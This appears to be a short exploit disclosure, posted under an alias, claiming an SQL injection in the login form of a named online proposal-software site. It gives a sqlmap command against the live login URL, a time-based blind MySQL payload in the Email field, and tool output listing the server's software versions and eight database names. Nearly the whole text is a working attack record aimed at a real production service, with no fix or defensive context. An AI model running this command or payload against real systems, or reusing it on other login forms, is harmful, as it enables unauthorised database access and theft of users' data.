# Exploit Title:Better Proposals: Online Proposal Software | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://betterproposals.io/2/login/" --form --dbs --batch --------------------------------------------------------------------------------------------------- .io British Territories in the Indian Ocean Better Proposals: Online Proposal Software Online Proposal Software - Better Proposals https://betterproposals.io/2/login/ --- Parameter: Email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Email=rLlf' AND (SELECT 5491 FROM (SELECT(SLEEP(5)))kKlT) AND 'hbrR'='hbrR&Password=&login=Sign In&RememberMe=1 --- the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.6.40 the back-end DBMS: MySQL >= 5.0.12 available databases [8]: [+] better_blog [+] information_schema [+] innodb [+] mysql [+] performance_schema [+] rpawsuebaq [+] sys [+] tmp